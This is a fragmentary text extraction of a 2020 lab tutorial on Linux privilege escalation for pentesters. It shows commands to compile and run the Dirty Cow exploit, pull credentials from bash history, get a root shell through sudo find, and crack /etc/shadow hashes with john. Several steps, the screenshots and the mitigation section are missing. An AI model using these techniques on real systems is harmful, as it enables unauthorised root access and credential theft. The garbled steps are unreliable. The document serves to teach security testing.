A Hands-On Approach To Linux Privilege Escalation: Tanishq Sharma, Shikhar Saxena
A Hands-On Approach To Linux Privilege Escalation: Tanishq Sharma, Shikhar Saxena
approach to
Linux
Privilege
Escalation
Tanishq Sharma, Shikhar Saxena
INTRODUCTION
This document is intended to provide multiple techniques that pentester can use
to escalate their privileges and gain access to higher roles(example: administrator
or root).
Lucideus 2020 2
Linux Privilege Escalation
Linux Privilege Escalation can be of many types but the types which this document will cover is :
2. In the git repo there are credentials provided for the machine:
3. Now login into the machine and check the ip address using ifconfig command in our
case it is 192.168.110.129.
Lucideus 2020 3
Linux Privilege Escalation
1. Start with taking the ssh instance of the victim machine by using the command ssh
[email protected] (Use the username: user and password: password321).
2. After getting the ssh of the victim machine try to do some system enumeration to get
some information about the target system by using commands like “uname -a” and “cat
/proc/version”.
3. So after getting some information about the system try to find an exploit for the
corresponding linux system. In this case the linux version was vulnerable to Dirty Cow
exploit.
A. Exploit can be founded at: https://www.exploitdb.com/exploits/40839
B. Now copy the code of the exploit.
4. Now create a file by using the command “nano dirty.c” and paste the exploit code in the
file.
5. After this compile the exploit by using the command:
● gcc -pthread dirty.c -o dirty -lcrypt
6. After compiling the exploit, run the compiled file in this case “./dirty”.
Lucideus 2020 4
Linux Privilege Escalation
7. After executing the exploit will ask to enter a password so enter any password that you
can remember.
● su firefart (it will prompt for password enter the password you entered at the time
when the exploit was executing).
Now we know that the exploit actually worked as we got the root privilege.
Lucideus 2020 5
Linux Privilege Escalation
1. Start with taking the ssh instance of the victim machine by using the command ssh
[email protected] (Use the username: user and password: password321).
2. Now look into the commands that had been used in the target machine previously by
using command “history” or “cat .bash_history”.
3. From the output , we can see the credentials for MySQL but let's try to use these
credentials to get root privilege.
From the above screenshot we can see that the credentials that we found from the
history command also worked for root user.
Lucideus 2020 6
Linux Privilege Escalation
1. Start with taking the ssh instance of the victim machine by using the command ssh
[email protected] (Use the username: user and password: password321).
From the output , notice the list of programmes that can be executed via sudo.
3. Notice that the find command can be run via sudo, so we can use find command to
elevate our privilege by using the command “sudo find . -exec /bin/sh \; -quit”
Since find command was allowed to run via sudo we used it to escalate our privilege.
Lucideus 2020 7
Linux Privilege Escalation
1. Start with taking the ssh instance of the victim machine by using the command ssh
[email protected] (Use the username: user and password:password321).
So we can see that /etc/shadow file is having read permission, so the regular user is
allowed to read this file.
Lucideus 2020 8
Linux Privilege Escalation
4. Now in your Attacker machine open the command prompt and type: echo “root_hash” >
hash.txt
5. After putting the hash in a file try to crack it by using the command: john
--wordlist=<path/to/wordlist> hash.txt
6. From the output , notice the cracked credentials in this case it is “password123” and use it
to escalate your privilege.
From the above screenshot we can see that the credentials that we found from
cracking the hash worked for the root.
Lucideus 2020 9
Linux Privilege Escalation
1. Start with taking the ssh instance of the victim machine by using the command ssh
[email protected] (Use the username: user and password: password321).
Lucideus 2020 10
Linux Privilege Escalation
5. Wait 1 minute for the bash script to execute after that in your command prompt type:
/tmp/bash -p
Lucideus 2020 11
Mitigation:
Lucideus 2020 12
References:
1. https://www.exploit-db.com/exploits/40839
2. https://gtfobins.github.io/#+sudo
3. https://www.exploit-db.com/docs/46131
4. https://www.netsparker.com/blog/web-security/privilege-escalation/
5. https://github.com/sagishahar/lpeworkshop
6. https://drive.google.com/file/d/0B6EDpYQYL72rQ2VuWS1QR2ZsUlU/view
7. https://www.exploit-db.com/exploits/40839
Lucideus 2020 13
Lucideus 2020 14